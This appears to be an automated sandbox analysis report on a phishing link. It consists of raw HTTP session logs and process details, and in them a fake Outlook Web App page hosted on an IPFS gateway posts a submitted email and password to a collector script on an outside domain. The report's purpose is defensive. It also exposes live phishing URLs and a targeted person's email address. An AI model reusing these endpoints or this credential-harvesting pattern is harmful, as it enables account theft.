                            2025-01-07 17:46:42 UTC768INData Raw: 00 00 01 00 03 00 20 20 00 00 01 00 20 00 a8 10 00 00 36 00 00 00 18 18 00 00 01 00 20 00 88 09 00 00 de 10 00 00 10 10 00 00 01 00 20 00 68 04 00 00 66 1a 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c2 6c 00 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii: 6 hf( @ l
                            2025-01-07 17:46:42 UTC7118INData Raw: 00 ff c5 72 00 ff c5 71 00 ff c5 70 00 ff c4 6f 00 ff c4 6f 00 ff c3 6e 00 ff c3 6d 00 ff c3 6d 00 ff c3 6c 00 ff c2 6c 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c9 77 00 ff c9 76 00 ff c8 76 00 ff c8 75 00 ff c8 75 00 ff c8 74 00 ff c7 73 00 ff c7 73 00 ff c5 72 00 ff c5 71 00 ff c5 70 00 ff c4 6f 00 ff c4 6f 00 ff c3 6e 00 ff c3 6d 00 ff c3 6d 00 ff c3 6c 00 ff c2 6c 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c9 77 00 ff c9 76 00 ff c8 76 00 ff c8 75 00 ff c8 75 00 ff c8 74 00 ff c7 73 00 ff c7
                            Data Ascii: rqpoonmmllwvvuutssrqpoonmmllwvvuuts


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            10192.168.2.164973266.29.153.554436900C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-07 17:47:09 UTC629OUTOPTIONS /ar/main.php HTTP/1.1
                            Host: xsapz.com
                            Connection: keep-alive
                            Accept: */*
                            Access-Control-Request-Method: POST
                            Access-Control-Request-Headers: content-type
                            Origin: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Dest: empty
                            Referer: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-07 17:47:10 UTC439INHTTP/1.1 200 OK
                            keep-alive: timeout=5, max=100
                            x-powered-by: PHP/8.1.31
                            access-control-allow-origin: *
                            access-control-allow-credentials: true
                            access-control-max-age: 86400
                            access-control-allow-methods: GET, POST, OPTIONS
                            access-control-allow-headers: content-type
                            content-type: text/html; charset=UTF-8
                            content-length: 0
                            date: Tue, 07 Jan 2025 17:47:10 GMT
                            server: LiteSpeed
                            x-turbo-charged-by: LiteSpeed
                            connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            11192.168.2.164973366.29.153.554436900C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-07 17:47:11 UTC740OUTPOST /ar/main.php HTTP/1.1
                            Host: xsapz.com
                            Connection: keep-alive
                            Content-Length: 95
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-platform: "Windows"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Content-Type: application/json; charset=utf-8
                            Accept: */*
                            Origin: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Referer: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-07 17:47:11 UTC95OUTData Raw: 7b 22 65 6d 61 69 6c 22 3a 22 6a 61 63 6f 62 40 73 74 65 69 6e 62 6f 72 6e 2e 63 6f 6d 22 2c 22 70 61 73 73 77 6f 72 64 22 3a 22 46 75 63 6b 41 70 68 69 73 68 65 72 22 2c 22 64 65 73 63 22 3a 22 4f 75 74 6c 6f 6f 6b 20 57 65 62 61 70 70 20 4c 6f 67 69 6e 20 44 65 74 61 69 6c 73 22 7d
                            Data Ascii: {"email":"jacob@steinborn.com","password":"FuckAphisher","desc":"Outlook Webapp Login Details"}
                            2025-01-07 17:47:12 UTC345INHTTP/1.1 200 OK
                            keep-alive: timeout=5, max=100
                            x-powered-by: PHP/8.1.31
                            access-control-allow-origin: *
                            access-control-allow-credentials: true
                            access-control-max-age: 86400
                            content-type: text/html; charset=UTF-8
                            content-length: 0
                            date: Tue, 07 Jan 2025 17:47:12 GMT
                            server: LiteSpeed
                            x-turbo-charged-by: LiteSpeed
                            connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            12192.168.2.1649713146.190.178.794436900C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-07 17:47:12 UTC786OUTGET /owa/auth/15.0.1497/themes/resources/segoeui-semilight.ttf HTTP/1.1
                            Host: bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            Origin: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: font
                            Referer: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-07 17:47:12 UTC997INHTTP/1.1 404 Not Found
                            Date: Tue, 07 Jan 2025 17:47:12 GMT
                            Content-Type: text/plain; charset=utf-8
                            Content-Length: 229
                            Connection: close
                            Access-Control-Allow-Headers: Content-Type
                            Access-Control-Allow-Headers: Range
                            Access-Control-Allow-Headers: User-Agent
                            Access-Control-Allow-Headers: X-Requested-With
                            Access-Control-Allow-Methods: GET
                            Access-Control-Allow-Methods: HEAD
                            Access-Control-Allow-Methods: OPTIONS
                            Access-Control-Allow-Origin: *
                            Access-Control-Expose-Headers: Content-Length
                            Access-Control-Expose-Headers: Content-Range
                            Access-Control-Expose-Headers: X-Chunked-Output
                            Access-Control-Expose-Headers: X-Ipfs-Path
                            Access-Control-Expose-Headers: X-Ipfs-Roots
                            Access-Control-Expose-Headers: X-Stream-Output
                            X-Content-Type-Options: nosniff
                            X-Ipfs-Path: /ipfs/bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu/owa/auth/15.0.1497/themes/resources/segoeui-semilight.ttf
                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                            X-Ipfs-Pop: gateway-fra1
                            2025-01-07 17:47:12 UTC229INData Raw: 66 61 69 6c 65 64 20 74 6f 20 72 65 73 6f 6c 76 65 20 2f 69 70 66 73 2f 62 61 66 6b 72 65 69 65 6a 33 69 34 74 78 79 34 61 35 71 36 75 6e 34 34 68 66 61 75 75 35 64 66 78 66 73 63 6f 64 61 35 65 32 6d 37 72 73 76 69 79 78 66 66 6c 70 68 76 71 67 75 2f 6f 77 61 2f 61 75 74 68 2f 31 35 2e 30 2e 31 34 39 37 2f 74 68 65 6d 65 73 2f 72 65 73 6f 75 72 63 65 73 2f 73 65 67 6f 65 75 69 2d 73 65 6d 69 6c 69 67 68 74 2e 74 74 66 3a 20 6e 6f 20 6c 69 6e 6b 20 6e 61 6d 65 64 20 22 6f 77 61 22 20 75 6e 64 65 72 20 62 61 66 6b 72 65 69 65 6a 33 69 34 74 78 79 34 61 35 71 36 75 6e 34 34 68 66 61 75 75 35 64 66 78 66 73 63 6f 64 61 35 65 32 6d 37 72 73 76 69 79 78 66 66 6c 70 68 76 71 67 75 0a
                            Data Ascii: failed to resolve /ipfs/bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu/owa/auth/15.0.1497/themes/resources/segoeui-semilight.ttf: no link named "owa" under bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            13192.168.2.164973466.29.153.554436900C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-07 17:47:13 UTC344OUTGET /ar/main.php HTTP/1.1
                            Host: xsapz.com
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-07 17:47:13 UTC242INHTTP/1.1 200 OK
                            keep-alive: timeout=5, max=100
                            x-powered-by: PHP/8.1.31
                            content-type: text/html; charset=UTF-8
                            content-length: 0
                            date: Tue, 07 Jan 2025 17:47:13 GMT
                            server: LiteSpeed
                            x-turbo-charged-by: LiteSpeed
                            connection: close


                            Click to jump to process

                            Click to jump to process

                            Click to jump to process

                            Target ID:0
                            Start time:12:46:33
                            Start date:07/01/2025
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                            Imagebase:0x7ff7f9810000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:false

                            Target ID:1
                            Start time:12:46:34
                            Start date:07/01/2025
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2004,i,9343348365706699268,11079859992953663634,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                            Imagebase:0x7ff7f9810000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:false

                            Target ID:2
                            Start time:12:46:35
                            Start date:07/01/2025
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://universidad-unidem.edu.mx/mah/i/amFjb2JAc3RlaW5ib3JuLmNvbQ=="
                            Imagebase:0x7ff7f9810000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            No disassembly